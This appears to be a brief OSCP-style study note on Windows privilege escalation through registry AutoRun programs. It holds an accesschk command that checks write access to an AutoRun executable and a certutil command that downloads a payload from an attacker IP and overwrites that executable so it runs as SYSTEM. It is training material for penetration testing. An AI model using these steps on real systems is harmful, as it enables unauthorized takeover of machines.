// notes/ PrivEsc — Windows
🪟
Registy Autoruns
AutoRun is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing Autorun program…
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/registy_autoruns ↗AutoRuns
Overview
AutoRun is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing Autorun program. When the computer restarts and an Administrator logs in it will run the malicious executable as system.
Escalation via AutoRun
Check for AutoRuns in the registry using PowerUp
<figure><img src="/files/7WGNkZLZJ1hOIYjdfUjB" alt=""><figcaption><p>TCM Windows Priv Esc on THM</p></figcaption></figure>Check for write access to the file. Should return with FILE_ALL_ACCESS under RW Everyone
powerquery
01accesschk64.exe -wvu "C:\Program Files\AutorunProgram.exe"Replace AutoRun executable
powerquery
01certutil.exe -urlcache -f http://10.10.14.1/program.exe "C:\Program Files\Autorun Program\program.exe"